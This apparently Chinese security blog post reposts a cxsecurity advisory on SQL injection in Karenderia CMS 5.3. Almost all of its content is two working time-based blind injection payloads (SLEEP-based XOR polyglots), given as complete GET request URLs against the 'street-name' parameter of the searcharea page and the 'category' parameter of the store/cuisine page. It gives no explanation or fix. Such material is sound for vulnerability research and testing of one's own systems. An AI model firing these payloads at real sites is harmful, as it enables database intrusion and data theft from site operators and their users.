Karenderia CMS 5.3 SQL Injection


漏洞来源

https://cxsecurity.com/issue/WLB-2019070037

Exploit

Exp1

1
2
3
4
5
6
# Attack Pattern :
1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f

# GET Method :
http://localhost/kmrs/searcharea?st=Los%20Angeles,%20CA,%20United%20States&street-name=1%20+%20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))/*'XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR'|
"XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR"*/

Exp2

1
2
3
4
5
# Attack Pattern :
1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
# GET Method :
http://localhost/kmrs/store/cuisine/?category=1%20+%20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))/*'XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR'|
"XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR"*/&page=2
------ 本文结束 ------

本文标题:Karenderia CMS 5.3 SQL Injection

文章作者:Fi9Coder

发布时间:2019年08月01日 - 19:08

最后更新:2019年08月01日 - 20:08

原始链接:http://www.safeinfo.me/2019/08/01/Karenderia-CMS-5-3-SQL-Injection.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

Fi9Coder wechat
扫一扫,加入信安圈。
0%